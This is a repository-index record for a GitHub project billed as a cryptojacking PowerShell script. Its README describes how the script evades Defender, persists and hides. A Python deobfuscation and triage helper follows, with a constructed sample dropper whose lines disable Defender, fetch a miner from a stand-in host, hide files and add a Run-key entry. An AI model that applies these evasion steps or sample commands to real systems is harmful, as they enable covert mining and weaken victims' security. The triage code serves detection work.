{"id":21233698,"url":"https://github.com/bdr-pro/silent-penguin-malware-script","last_synced_at":"2025-03-15T02:44:00.298Z","repository":{"id":172017739,"uuid":"636899596","full_name":"BDR-Pro/Silent-Penguin-malware-script","owner":"BDR-Pro","description":"mining script can be injected to ligit exe to make the victim mine monero for you","archived":false,"fork":false,"pushed_at":"2024-02-12T19:31:00.000Z","size":15679,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-01-21T18:38:50.926Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"PowerShell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BDR-Pro.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2023-05-05T23:30:23.000Z","updated_at":"2024-01-28T09:51:31.000Z","dependencies_parsed_at":"2024-02-12T20:50:44.214Z","dependency_job_id":null,"html_url":"https://github.com/BDR-Pro/Silent-Penguin-malware-script","commit_stats":null,"previous_names":["bdr-pro/my-first-mining-malware-script"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BDR-Pro%2FSilent-Penguin-malware-script","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BDR-Pro%2FSilent-Penguin-malware-script/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BDR-Pro%2FSilent-Penguin-malware-script/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BDR-Pr
o%2FSilent-Penguin-malware-script/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BDR-Pro","download_url":"https://codeload.github.com/BDR-Pro/Silent-Penguin-malware-script/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243676707,"owners_count":20329432,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-21T00:00:04.348Z","updated_at":"2025-03-15T02:44:00.279Z","avatar_url":"https://github.com/BDR-Pro.png","language":"PowerShell","funding_links":[],"categories":[],"sub_categories":[],"readme":"# My mining virus\n```diff\n+ This is part of my malware developing projects, please make sure you follow any updates\n```\n\n![image](https://github.com/BDR-Pro/My-first-mining-malware-script/assets/91114465/ec89a426-1ae7-4535-8e32-b6e1468dd7c5)\n\n![image](https://github.com/BDR-Pro/Silent-Penguin-malware-script/assets/91114465/6b4aca66-c217-4e6c-b95b-53b718bd9224)\n[REPORT](https://www.virustotal.com/gui/file/5215d83ffe963bae62ff36e990c9cb1e3194ec7f1d189284077a16de6a42a62d/detection)\n\nMining script that can be injected into a legit exe to make the victim mine Monero for you.\nEmbedded to make with download the start and the word, running the word directly\nstart to make sure the mining task is persistent.\n\nThe provided text appears to be a PowerShell script with malicious intent, designed to conduct unauthorized activities on a targeted machine, typically associated with cyber threats such as malware or a crypto miner. 
Here's a breakdown of its key components and functionalities:\n\n1. **Aliases and Variable Initializations**: The script starts by defining aliases for common PowerShell cmdlets so that the cmdlet names never appear verbatim, hiding its actions from casual observation and from automated analysis tools that key on those names.\n\n2. **Remote File Downloads**: It builds download URLs by concatenating string fragments at run time, so the full URL never appears as a single literal in the script; this defeats simple string-matching detection.\n\n3. **Execution of Downloaded Files**: After downloading, it executes the files, a common malware behaviour for running payloads retrieved from remote servers.\n\n4. **Sleep Commands**: The script uses sleep commands to delay operations, possibly to outlast the time window of automated sandbox analysis.\n\n5. **Obfuscation Techniques**: It hides the actual commands as arrays of character codes that are joined back into strings just before execution, making static analysis and detection harder.\n\n6. **Disabling Security Features**: It disables Windows Defender real-time monitoring and sample submission, weakening the host's defenses before the miner is dropped. These configuration changes are recorded in the Defender operational event log (event ID 5007), which makes them a high-signal detection point even when the script itself is obfuscated.\n\n7. **Cryptocurrency Miner Installation**: The script downloads and installs XMRig, a legitimate Monero miner that attackers routinely misuse for unauthorized mining on compromised machines.\n\n8. **Persistence Mechanisms**: It modifies system settings and places files in specific locations so the miner runs continuously, including configuring it to start with Windows.\n\n9. **Concealment**: The script marks its files and directories as hidden to avoid notice by the user or by simple file-system listings.\n\n10. **Execution with Elevated Privileges**: It attempts to run processes with elevated privileges, which is required for operations such as changing Defender settings or installing software system-wide; on a host with UAC enabled this still raises a consent prompt unless the script is already running elevated.\n\n11. 
**Obfuscated Final Note**: The script ends with an encoded message which, when decoded, reads as a signature or a message from the author to whoever decodes it during analysis.\n\nThis script is a serious security threat and must not be executed outside an isolated analysis environment. If you encounter it during a security analysis or an incident response, isolate the affected system, investigate the full scope of the compromise, and remediate: stop the miner process, remove the startup entry and the hidden files the script plants, and re-enable the Defender settings it disabled.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbdr-pro%2Fsilent-penguin-malware-script","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbdr-pro%2Fsilent-penguin-malware-script","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbdr-pro%2Fsilent-penguin-malware-script/lists"}
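The README breakdown above (items 1, 2, 5 and 6 in particular) describes a script whose commands are hidden behind PowerShell aliases, concatenated string fragments and character-code arrays, so a plain grep for a cmdlet name or for "xmrig" over the raw file finds nothing. The following Python triage helper is an added example, not code from this repository or its author: it peels those three layers in a loop and then scans the decoded text for the behaviours listed in the breakdown. The sample script at the bottom is constructed for this example to imitate the described patterns (non-routable hostname, no real payload); the indicator regexes, the use of the Set-MpPreference cmdlet for the Defender change and the hypothetical alias name `dl` are the example's own assumptions, not details taken from the repository. Python is used rather than PowerShell because this runs on the analyst's machine, not the victim's.

```python
"""Triage helper for PowerShell droppers that hide commands behind aliases,
string concatenation and character-code arrays.  Added example, not code
from the repository; the sample script at the bottom is constructed."""
import re

# Set-Alias -Name dl -Value Invoke-WebRequest   (positional form also accepted)
ALIAS_DEF_RE = re.compile(
    r"\b(?:Set|New)-Alias\s+(?:-Name\s+)?([\w-]+)\s+(?:-Value\s+)?([\w-]+)", re.I)
# [char[]](83,101,116,...) : code points that -join / [string]::Join rebuild
CHAR_ARRAY_RE = re.compile(r"\[char\[\]\]\s*\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I)
# [char]72+[char]75+... : individual casts glued together with +
CHAR_CAST_RUN_RE = re.compile(r"\[char\]\s*\d+(?:\s*\+\s*\[char\]\s*\d+)*", re.I)
CHAR_CAST_RE = re.compile(r"\[char\]\s*(\d+)", re.I)
# 'ht' + 'tp' : two single-quoted literals glued with +
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

# Behaviours named in the breakdown, matched line by line after decoding.
# The regexes are this example's assumptions, not signatures from the page.
INDICATORS = {
    "alias_definition": re.compile(r"\b(?:Set|New)-Alias\b", re.I),
    "remote_download": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Net\.WebClient|Start-BitsTransfer", re.I),
    "execute_payload": re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.I),
    "sleep_delay": re.compile(r"Start-Sleep", re.I),
    "defender_tamper": re.compile(
        r"Set-MpPreference[^\r\n]*-(?:Disable\w+|SubmitSamplesConsent)|Add-MpPreference[^\r\n]*-Exclusion", re.I),
    "miner": re.compile(r"xmrig|stratum\+tcp|monero", re.I),
    "persistence": re.compile(r"CurrentVersion\\Run|\\Startup\\|schtasks|Register-ScheduledTask", re.I),
    "hide_files": re.compile(r"\battrib\b[^\r\n]*\+h|Attributes[^\r\n]*Hidden", re.I),
    "elevation": re.compile(r"-Verb\s+RunAs", re.I),
}


def _codes_to_literal(codes):
    """Render decoded code points as a single-quoted PowerShell literal."""
    text = "".join(chr(int(c)) for c in codes)
    return "'" + text.replace("'", "''") + "'"


def resolve_aliases(script):
    """Replace uses of script-defined aliases with the cmdlets they hide."""
    aliases = dict(ALIAS_DEF_RE.findall(script))
    out = []
    for line in script.splitlines():
        if not ALIAS_DEF_RE.search(line):  # keep the definition lines as evidence
            for name, target in aliases.items():
                line = re.sub(r"(?<![\w-])" + re.escape(name) + r"(?![\w-])", target, line, flags=re.I)
        out.append(line)
    return "\n".join(out)


def decode_char_arrays(script):
    """[char[]](83,101,...) -> 'Se...' ; the surrounding -join is left in place."""
    return CHAR_ARRAY_RE.sub(lambda m: _codes_to_literal(m.group(1).split(",")), script)


def decode_char_casts(script):
    """[char]72+[char]75 -> 'HK'"""
    return CHAR_CAST_RUN_RE.sub(lambda m: _codes_to_literal(CHAR_CAST_RE.findall(m.group(0))), script)


def fold_concatenations(script):
    """'ht' + 'tp' + 's' -> 'https' ; repeat until no adjacent pair remains."""
    previous = None
    while previous != script:
        previous = script
        script = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return script


def deobfuscate(script):
    """Apply all layers until a fixed point; layers may expose each other."""
    previous = None
    while previous != script:
        previous = script
        script = fold_concatenations(decode_char_casts(decode_char_arrays(resolve_aliases(script))))
    return script


def scan(script):
    """Return {indicator_name: [matching lines]} for the behaviours above."""
    hits = {}
    for line in script.splitlines():
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.setdefault(name, []).append(line.strip())
    return hits


def triage(script):
    """Deobfuscate first, then scan; scanning the raw text misses the key hits."""
    decoded = deobfuscate(script)
    return decoded, scan(decoded)


def _as_char_array(text):
    """Encode text the way the dropper does; used only to build the sample."""
    return "[char[]](" + ",".join(str(ord(c)) for c in text) + ")"


# Constructed sample imitating the described style; example.invalid is non-routable.
SAMPLE_SCRIPT = "\n".join([
    "Set-Alias -Name dl -Value Invoke-WebRequest",
    "$u = 'ht' + 'tps://' + 'example' + '.invalid/' + 'xm' + 'rig.zip'",
    "$cmd = -join " + _as_char_array("Set-MpPreference -DisableRealtimeMonitoring $true"),
    "Start-Sleep -Seconds 30",
    "$hive = [char]72+[char]75+[char]67+[char]85",
    r"dl $u -OutFile $env:TEMP\x.zip",
    r"attrib +h +s $env:TEMP\x.exe",
    r"New-ItemProperty -Path ($hive + ':\Software\Microsoft\Windows\CurrentVersion\Run') -Name svc -Value $env:TEMP\x.exe",
    r"Start-Process $env:TEMP\x.exe -Verb RunAs",
])

if __name__ == "__main__":
    decoded_text, findings = triage(SAMPLE_SCRIPT)
    print(decoded_text)
    for indicator, lines in sorted(findings.items()):
        print(f"[{indicator}]", *lines, sep="\n  ")
```

Running `scan` on the raw sample flags only the alias definition, the sleep and the Start-Process line; the Defender change and the XMRig download surface only after `deobfuscate`, which is the point the breakdown makes about string matching. The decoder is deliberately regex-based and stops at the patterns the README names; a script that layers Base64 or compression on top would need those layers added to `deobfuscate`, and a run-time trace (script block logging) remains the more reliable source when static peeling fails.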